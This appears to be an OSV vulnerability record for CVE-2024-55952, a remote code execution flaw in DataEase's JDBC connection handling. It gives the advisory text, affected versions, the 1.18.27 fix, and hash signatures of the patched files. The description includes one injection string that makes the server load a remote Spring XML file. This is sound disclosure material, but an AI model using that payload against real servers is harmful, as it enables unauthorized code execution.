DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.
{
"cna_assigner": "GitHub_M",
"cwe_ids": [
"CWE-20"
],
"osv_generated_from": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2024/55xxx/CVE-2024-55952.json"
}{
"cpe": "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*",
"source": [
"CPE_RANGE",
"REFERENCES"
],
"extracted_events": [
{
"introduced": "0"
},
{
"fixed": "1.18.27"
}
]
}"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2024-55952.json"
"2026-07-22T03:35:51Z"
[
{
"signature_version": "v1",
"source": "https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1",
"id": "CVE-2024-55952-0a5e3094",
"digest": {
"threshold": 0.9,
"line_hashes": [
"182020811269873562107125190754910561249",
"211813033230790611424771587951912403581",
"57337582411762295881712096135840195446",
"280007923929317372875221687807498300374",
"128510257947228004914677151373531963246",
"293523817602657175868052534546008082620",
"288941054251953737719927889299771581619",
"72300016693376521599945400195424610825",
"93825172376401972904535550460750309953",
"212905539354010951941153556065360704586",
"339081076206286176550930361940862426377",
"251558540287303364084949129756101299743",
"252537005507308565970068158990282149328",
"220835986688838450969177573477686574146",
"60993190871904727282994533602264452834",
"120818857908881743294034245613238993052",
"250027737239600429417243011452452358822",
"184025494455006886331475658494697605651",
"47434397264718337053212763965370049792"
]
},
"target": {
"file": "core/backend/src/main/java/io/dataease/dto/datasource/MysqlConfiguration.java"
},
"deprecated": false,
"signature_type": "Line"
},
{
"signature_version": "v1",
"source": "https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1",
"id": "CVE-2024-55952-163b86d0",
"digest": {
"length": 1293.0,
"function_hash": "59479437966243511602363196126708312501"
},
"target": {
"function": "getJdbc",
"file": "core/backend/src/main/java/io/dataease/dto/datasource/PgConfiguration.java"
},
"deprecated": false,
"signature_type": "Function"
},
{
"signature_version": "v1",
"source": "https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1",
"id": "CVE-2024-55952-3c8b4489",
"digest": {
"threshold": 0.9,
"line_hashes": [
"218604338777642790685069244835187176827",
"161697867944344940650229941559275140298",
"276024941085862390274501384254352179111",
"318734915464596835689845002971935087521",
"67691285599808025088434611024460295875",
"165961363543364429366420618669687425578",
"85272030021970046619457345544717630622",
"296480588419946036891787043011331740916",
"126696841720036977716321166245466609618",
"204060396382753599755753378797058614002",
"225136925195082835278059347613984463824"
]
},
"target": {
"file": "core/backend/src/main/java/io/dataease/dto/datasource/RedshiftConfiguration.java"
},
"deprecated": false,
"signature_type": "Line"
},
{
"signature_version": "v1",
"source": "https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1",
"id": "CVE-2024-55952-bd9ba31f",
"digest": {
"length": 251.0,
"function_hash": "90181800386751477694627167903914398583"
},
"target": {
"function": "getJdbc",
"file": "core/backend/src/main/java/io/dataease/dto/datasource/RedshiftConfiguration.java"
},
"deprecated": false,
"signature_type": "Function"
},
{
"signature_version": "v1",
"source": "https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1",
"id": "CVE-2024-55952-eb83b2e8",
"digest": {
"threshold": 0.9,
"line_hashes": [
"170221171599612478595555909859717902215",
"182864902456935272141778159807704709696",
"57544332438300312335420175735713977294",
"244510898196010311882692744362070104571",
"159391496123703408365742860286397231131",
"66447004305530740707621100467205646864",
"290201130187511836121364603602625471643",
"101594560876218831957293608656646248670",
"188822854823644136722482190287678039421",
"279154043734763208390376870083329487572",
"177100154474042613142791097389531994528",
"319286234787647773437056350333996360132",
"79433877829888885633027275248318966662",
"198975878862715429353118892792686026085",
"93113150856017422359902813424132491185",
"298360722709620258700277702899131188927",
"42994657539220917030344839206183456629",
"25398738911736206921110734124899847034",
"303896877184790714387840253199643078422",
"93825172376401972904535550460750309953",
"293746793248191162618952762332632640130",
"133728314145255313478227056730619384680",
"264330893242590059124121951776668597730",
"222631649333180973453586663883566712989",
"311891237031764437091940699983999205709",
"238723273037389949721404006160678287539",
"119267620208540501041600515986837789320",
"67305898528663910404855856363929362337"
]
},
"target": {
"file": "core/backend/src/main/java/io/dataease/dto/datasource/PgConfiguration.java"
},
"deprecated": false,
"signature_type": "Line"
},
{
"signature_version": "v1",
"source": "https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1",
"id": "CVE-2024-55952-f4e6fb56",
"digest": {
"length": 912.0,
"function_hash": "218156284353965263201014183182410085122"
},
"target": {
"function": "getJdbc",
"file": "core/backend/src/main/java/io/dataease/dto/datasource/MysqlConfiguration.java"
},
"deprecated": false,
"signature_type": "Function"
}
]